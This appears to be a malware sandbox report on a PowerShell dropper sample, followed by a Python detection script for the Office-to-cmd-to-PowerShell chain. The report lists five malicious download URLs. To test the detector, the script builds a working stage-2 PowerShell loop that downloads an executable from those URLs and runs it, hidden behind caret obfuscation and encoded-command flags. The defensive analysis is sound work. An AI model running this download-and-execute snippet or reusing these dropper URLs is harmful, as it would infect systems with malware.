General

  • Target

    75b5887bf105e8c270a980a1122802d3_JaffaCakes118

  • Size

    81KB

  • Sample

    240526-ra6f6ahf55

  • MD5

    75b5887bf105e8c270a980a1122802d3

  • SHA1

    20bba6c529a1036e4252b9dd86c1a06f92221def

  • SHA256

    c57bc62f944a858d7b6b1e2ff89f50f466b260cf79385517cc9c108d9b244530

  • SHA512

    c49447e19f9dd885af05e67e8224f94f4a74c89f3104b11d0bfe6c74de61f7e41a393cba6e99329e34cd70e0133e017f30aefaffd97a1664b47900ff2bbb4998

  • SSDEEP

    1536:TptJlmrJpmxlRw99NB3+aEYvycIfhHfFUnRA5xuM:dte2dw99flJmfF6ex

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs (exe.dropper)

    http://michiganbusiness.us/jBE6
    http://ingridkaslik.com/8
    http://drdelaluz.com/Q7s1
    http://milehighffa.com/cqZHO01V
    http://avto-baki.ru/Ph9j

Targets

    • Target

      75b5887bf105e8c270a980a1122802d3_JaffaCakes118

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.
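The extracted config above is a ps1 dropper carrying five exe.dropper URLs, and the signatures describe the delivery chain: an unexpected child process under a parent that is typically an exploited or macro-enabled document, and an obfuscated cmd.exe command line. The Python below is an added example, not the sandbox's signature code and not the sample's script: it undoes cmd.exe caret escaping, decodes a PowerShell -EncodedCommand payload, pulls download URLs out of the result, and runs the two signature checks over constructed process-creation events. The event field names, the WINWORD.EXE parent, the caret threshold, and the stage-2 script (a download loop built from the report's five URLs) are all constructed assumptions; only the URLs themselves come from the report.

```python
"""Triage of an Office -> cmd.exe -> PowerShell dropper chain.

Added example, not the sandbox's own detection logic. Events and the
stage-2 script are constructed for illustration; field names are assumptions.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?i)[-/]e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"https?://[^\s'\"@;,)]+")

# The five dropper URLs from the extracted config above.
REPORT_URLS = [
    "http://michiganbusiness.us/jBE6",
    "http://ingridkaslik.com/8",
    "http://drdelaluz.com/Q7s1",
    "http://milehighffa.com/cqZHO01V",
    "http://avto-baki.ru/Ph9j",
]

# Constructed stand-in for a deobfuscated ps1 stage: try each URL in turn,
# run the first payload that downloads. Illustrative only, not the sample's script.
STAGE2 = (
    "$u='" + "@".join(REPORT_URLS) + "'.Split('@');"
    "$p=$env:TEMP+'\\'+(Get-Random)+'.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
    "Start-Process $p;break}catch{}}"
)
# -EncodedCommand takes base64 of the UTF-16LE script bytes.
ENCODED = base64.b64encode(STAGE2.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {   # constructed: document parent launching caret-obfuscated cmd -> encoded PowerShell
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd /c p^o^w^e^r^s^h^e^l^l -w hid^den -nop -e^nc " + ENCODED,
    },
    {   # constructed benign baseline
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd /c dir C:\\Users",
    },
]


def strip_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: '^x' becomes 'x', so 'p^o^w^e^r' reads 'power'."""
    out, i = [], 0
    while i < len(cmdline):
        if cmdline[i] == "^" and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 2
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except ValueError:  # includes binascii.Error and UnicodeDecodeError
        return None


def extract_dropper_urls(cmdline: str) -> list:
    """Collect unique http(s) URLs from the de-careted line and any decoded payload."""
    text = strip_carets(cmdline)
    decoded = decode_encoded_command(text)
    if decoded:
        text += "\n" + decoded
    seen = []
    for url in URL_RE.findall(text):
        if url not in seen:
            seen.append(url)
    return seen


def triage_event(event: dict) -> list:
    """Return the signature labels (my own wording) an event trips; [] means clean."""
    hits = []
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("Process spawned unexpected child process")
    # Caret count threshold (5) is an arbitrary constructed tuning value.
    if cmd.count("^") >= 5 or decode_encoded_command(strip_carets(cmd)):
        hits.append("Obfuscated cmd.exe command-line")
    if extract_dropper_urls(cmd):
        hits.append("Script host command line carries download URLs")
    return hits


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["image"], "<-", ev["parent_image"], "=>", triage_event(ev))
        for url in extract_dropper_urls(ev["command_line"]):
            print("   dropper URL:", url)
```

Caret stripping has to happen before the -EncodedCommand search, since `-e^nc` is how the switch itself gets hidden from naive string matching; the base64 payload is then decoded as UTF-16LE, which is what PowerShell expects, so a UTF-8-encoded blob would fail to decode and is reported as no payload rather than as garbage.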

MITRE ATT&CK Enterprise v15